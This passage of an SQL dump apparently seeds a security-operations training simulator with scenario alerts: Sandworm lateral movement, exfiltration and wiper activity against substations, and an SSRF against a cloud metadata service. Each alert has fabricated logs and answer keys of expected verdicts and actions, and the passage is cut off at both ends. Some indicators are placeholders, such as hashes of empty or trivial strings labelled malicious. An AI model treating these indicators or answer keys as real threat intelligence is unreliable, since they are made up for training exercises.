Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Critical ICS/SCADA node within the infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"web_shell.jsp\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File associated with web shell attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Tool\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious web 
shell.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(868, 'Lateral Movement to Critical Substations', 'high', 'Firewall and Network Logs', 'Leveraging their foothold, the attackers moved laterally across the network, targeting and compromising additional substations. The operation was identified through suspicious network traffic between internal systems and command and control indicators.', 'Network Propagation', 'T1570 - Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:47Z\",\"src_ip\":\"10.20.30.40\",\"dest_ip\":\"192.168.100.150\",\"dest_port\":445,\"protocol\":\"SMB\",\"action\":\"ALLOWED\",\"filename\":\"OlympicDestroyer.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"ad_admin\",\"external_ip\":\"203.0.113.45\",\"event_type\":\"file_transfer\",\"indicator_type\":\"ICS/SCADA Targeting\",\"threat_actor\":\"Sandworm\",\"description\":\"Suspicious SMB traffic detected with potential malware transfer targeting critical substations.\"}', '2026-01-15 00:52:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.20.30.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Compromised internal host used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.100.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"internal\",\"details\":\"Targeted substation IP.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Sandworm APT.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"OlympicDestroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Identified as Olympic Destroyer malware, used in previous attacks by 
Sandworm.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"MD5 hash of Olympic Destroyer malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(869, 'Exfiltration of Control System Data', 'critical', 'Data Loss Prevention (DLP) Tools', 'The attackers have successfully exfiltrated sensitive ICS protocol data to their external server. This data is crucial for refining their attack strategies and ensuring future operational success.', 'Data Exfiltration', 'T1048.001 - Exfiltration Over Command and Control Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"src_ip\":\"10.0.5.23\",\"dst_ip\":\"185.143.223.18\",\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"username\":\"j.doe\",\"file\":\"ICS_data_extract.zip\",\"file_hash\":\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\",\"bytes_sent\":2048576,\"alert_id\":\"DLP-EXF-20231015-001\",\"description\":\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to an external IP address.\"}', '2026-01-15 00:52:49', '2026-02-16 17:57:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.18\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Sandworm operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal ICS network.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ICS_data_extract.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"File name indicates potential exfiltration activity.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"suspicious\",\"details\":\"Hash not recognized in whitelist, matches suspicious 
pattern.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.533Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"src_ip\\\":\\\"10.0.5.23\\\",\\\"dst_ip\\\":\\\"185.143.223.18\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file\\\":\\\"ICS_data_extract.zip\\\",\\\"file_hash\\\":\\\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\\\",\\\"bytes_sent\\\":2048576,\\\"alert_id\\\":\\\"DLP-EXF-20231015-001\\\",\\\"description\\\":\\\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to an external IP address.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.533Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"src_ip\\\":\\\"10.0.5.23\\\",\\\"dst_ip\\\":\\\"185.143.223.18\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file\\\":\\\"ICS_data_extract.zip\\\",\\\"file_hash\\\":\\\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\\\",\\\"bytes_sent\\\":2048576,\\\"alert_id\\\":\\\"DLP-EXF-20231015-001\\\",\\\"description\\\":\\\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to an external IP address.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.533Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"src_ip\\\":\\\"10.0.5.23\\\",\\\"dst_ip\\\":\\\"185.143.223.18\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file\\\":\\\"ICS_data_extract.zip\\\",\\\"file_hash\\\":\\\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\\\",\\\"bytes_sent\\\":2048576,\\\"alert_id\\\":\\\"DLP-EXF-20231015-001\\\",\\\"description\\\":\\\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to an external IP address.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.533Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"src_ip\\\":\\\"10.0.5.23\\\",\\\"dst_ip\\\":\\\"185.143.223.18\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file\\\":\\\"ICS_data_extract.zip\\\",\\\"file_hash\\\":\\\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\\\",\\\"bytes_sent\\\":2048576,\\\"alert_id\\\":\\\"DLP-EXF-20231015-001\\\",\\\"description\\\":\\\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to an external IP address.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.533Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"src_ip\\\":\\\"10.0.5.23\\\",\\\"dst_ip\\\":\\\"185.143.223.18\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"username\\\":\\\"j.doe\\\",\\\"file\\\":\\\"ICS_data_extract.zip\\\",\\\"file_hash\\\":\\\"7a2b9c1f9d6f4a2bb5c3f9e3a7b8c2d1\\\",\\\"bytes_sent\\\":2048576,\\\"alert_id\\\":\\\"DLP-EXF-20231015-001\\\",\\\"description\\\":\\\"The file named ICS_data_extract.zip containing ICS protocol data was exfiltrated to 
an external IP address.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(870, 'Coordinated Grid Disruption', 'critical', 'ICS Monitoring Systems', 'Culminating their efforts, Sandworm executes a synchronized attack on multiple substations, resulting in significant power outages across Ukraine. Advanced techniques were employed, leveraging ICS/SCADA targeting and wiper malware to cause destruction.', 'Destructive Attack', 'T1485 - Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T02:45:37Z\",\"event_id\":\"4625\",\"source_ip\":\"185.14.89.32\",\"destination_ip\":\"192.168.10.45\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"malware_filename\":\"wiper_destruction.exe\",\"username\":\"admin_ukraine\",\"event_description\":\"Unauthorized execution of wiper malware on ICS systems detected\",\"network_protocol\":\"TCP\",\"destination_port\":445,\"action_taken\":\"Execution blocked\",\"status\":\"failed\"}', '2026-01-15 00:52:49', '2026-02-16 17:57:26', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.14.89.32\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Sandworm operations in previous attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP of targeted ICS substation\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Sandworm wiper malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wiper_destruction.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Filename associated with wiper malware used in 
attacks\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_ukraine\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.535Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:37Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.14.89.32\\\",\\\"destination_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"wiper_destruction.exe\\\",\\\"username\\\":\\\"admin_ukraine\\\",\\\"event_description\\\":\\\"Unauthorized execution of wiper malware on ICS systems detected\\\",\\\"network_protocol\\\":\\\"TCP\\\",\\\"destination_port\\\":445,\\\"action_taken\\\":\\\"Execution blocked\\\",\\\"status\\\":\\\"failed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.535Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:37Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.14.89.32\\\",\\\"destination_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"wiper_destruction.exe\\\",\\\"username\\\":\\\"admin_ukraine\\\",\\\"event_description\\\":\\\"Unauthorized execution of wiper malware on ICS systems 
detected\\\",\\\"network_protocol\\\":\\\"TCP\\\",\\\"destination_port\\\":445,\\\"action_taken\\\":\\\"Execution blocked\\\",\\\"status\\\":\\\"failed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.535Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:37Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.14.89.32\\\",\\\"destination_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"wiper_destruction.exe\\\",\\\"username\\\":\\\"admin_ukraine\\\",\\\"event_description\\\":\\\"Unauthorized execution of wiper malware on ICS systems detected\\\",\\\"network_protocol\\\":\\\"TCP\\\",\\\"destination_port\\\":445,\\\"action_taken\\\":\\\"Execution blocked\\\",\\\"status\\\":\\\"failed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.535Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:37Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.14.89.32\\\",\\\"destination_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"wiper_destruction.exe\\\",\\\"username\\\":\\\"admin_ukraine\\\",\\\"event_description\\\":\\\"Unauthorized execution of wiper malware on ICS systems detected\\\",\\\"network_protocol\\\":\\\"TCP\\\",\\\"destination_port\\\":445,\\\"action_taken\\\":\\\"Execution blocked\\\",\\\"status\\\":\\\"failed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.535Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:37Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.14.89.32\\\",\\\"destination_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"wiper_destruction.exe\\\",\\\"username\\\":\\\"admin_ukraine\\\",\\\"event_description\\\":\\\"Unauthorized execution of wiper malware on ICS systems detected\\\",\\\"network_protocol\\\":\\\"TCP\\\",\\\"destination_port\\\":445,\\\"action_taken\\\":\\\"Execution blocked\\\",\\\"status\\\":\\\"failed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(871, 'Initial Access via SSRF Vulnerability', 'critical', 'AWS CloudTrail Logs', 'An unauthorized access attempt was detected exploiting a misconfigured AWS WAF through a Server-Side Request Forgery (SSRF) vulnerability. The attacker aimed to access the internal AWS metadata service of Capital One\'s cloud environment.', 'Server-Side Request Forgery', 'T1071.001 - Application Layer Protocol', 1, 'resolved', NULL, '{\"eventVersion\":\"1.08\",\"userIdentity\":{\"type\":\"AssumedRole\",\"arn\":\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\",\"accountId\":\"123456789012\",\"accessKeyId\":\"AKIAIOSFODNN7EXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2023-10-05T14:48:00Z\"}}},\"eventTime\":\"2023-10-05T14:55:00Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"DescribeInstances\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"198.51.100.23\",\"userAgent\":\"curl/7.64.1\",\"requestParameters\":{\"instanceIds\":[\"i-0abcd1234efgh5678\"]},\"responseElements\":null,\"requestID\":\"c7f9c6e1-1234-5678-9abc-def123456789\",\"eventID\":\"8d7f5b12-1234-5678-9abc-abcdef012345\",\"readOnly\":false,\"resources\":[{\"ARN\":\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\",\"accountId\":\"123456789012\",\"type\":\"AWS::EC2::Instance\"}],\"eventType\":\"AwsApiCall\",\"managementEvent\":true,\"recipientAccountId\":\"123456789012\"}', '2026-01-15 00:53:58', '2026-02-16 17:56:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous SSRF attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Role 
used by EC2 instances in the affected AWS account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"AKIAIOSFODNN7EXAMPLE\\\",\\\"sessionContext\\\":{\\\"attributes\\\":{\\\"mfaAuthenticated\\\":\\\"true\\\",\\\"creationDate\\\":\\\"2023-10-05T14:48:00Z\\\"}}},\\\"eventTime\\\":\\\"2023-10-05T14:55:00Z\\\",\\\"eventSource\\\":\\\"ec2.amazonaws.com\\\",\\\"eventName\\\":\\\"DescribeInstances\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"curl/7.64.1\\\",\\\"requestParameters\\\":{\\\"instanceIds\\\":[\\\"i-0abcd1234efgh5678\\\"]},\\\"responseElements\\\":null,\\\"requestID\\\":\\\"c7f9c6e1-1234-5678-9abc-def123456789\\\",\\\"eventID\\\":\\\"8d7f5b12-1234-5678-9abc-abcdef012345\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::EC2::Instance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"AKIAIOSFODNN7EXAMPLE\\\",\\\"sessionContext\\\":{\\\"attributes\\\":{\\\"mfaAuthenticated\\\":\\\"true\\\",\\\"creationDate\\\":\\\"2023-10-05T14:48:00Z\\\"}}},\\\"eventTime\\\":\\\"2023-10-05T14:55:00Z\\\",\\\"eventSource\\\":\\\"ec2.amazonaws.com\\\",\\\"eventName\\\":\\\"DescribeInstances\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"curl/7.64.1\\\",\\\"requestParameters\\\":{\\\"instanceIds\\\":[\\\"i-0abcd1234efgh5678\\\"]},\\\"responseElements\\\":null,\\\"requestID\\\":\\\"c7f9c6e1-1234-5678-9abc-def123456789\\\",\\\"eventID\\\":\\\"8d7f5b12-1234-5678-9abc-abcdef012345\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::EC2::Instance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"AKIAIOSFODNN7EXAMPLE\\\",\\\"sessionContext\\\":{\\\"attributes\\\":{\\\"mfaAuthenticated\\\":\\\"true\\\",\\\"creationDate\\\":\\\"2023-10-05T14:48:00Z\\\"}}},\\\"eventTime\\\":\\\"2023-10-05T14:55:00Z\\\",\\\"eventSource\\\":\\\"ec2.amazonaws.com\\\",\\\"eventName\\\":\\\"DescribeInstances\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"curl/7.64.1\\\",\\\"requestParameters\\\":{\\\"instanceIds\\\":[\\\"i-0abcd1234efgh5678\\\"]},\\\"responseElements\\\":null,\\\"requestID\\\":\\\"c7f9c6e1-1234-5678-9abc-def123456789\\\",\\\"eventID\\\":\\\"8d7f5b12-1234-5678-9abc-abcdef012345\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::EC2::Instance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"AKIAIOSFODNN7EXAMPLE\\\",\\\"sessionContext\\\":{\\\"attributes\\\":{\\\"mfaAuthenticated\\\":\\\"true\\\",\\\"creationDate\\\":\\\"2023-10-05T14:48:00Z\\\"}}},\\\"eventTime\\\":\\\"2023-10-05T14:55:00Z\\\",\\\"eventSource\\\":\\\"ec2.amazonaws.com\\\",\\\"eventName\\\":\\\"DescribeInstances\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"curl/7.64.1\\\",\\\"requestParameters\\\":{\\\"instanceIds\\\":[\\\"i-0abcd1234efgh5678\\\"]},\\\"responseElements\\\":null,\\\"requestID\\\":\\\"c7f9c6e1-1234-5678-9abc-def123456789\\\",\\\"eventID\\\":\\\"8d7f5b12-1234-5678-9abc-abcdef012345\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::EC2::Instance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
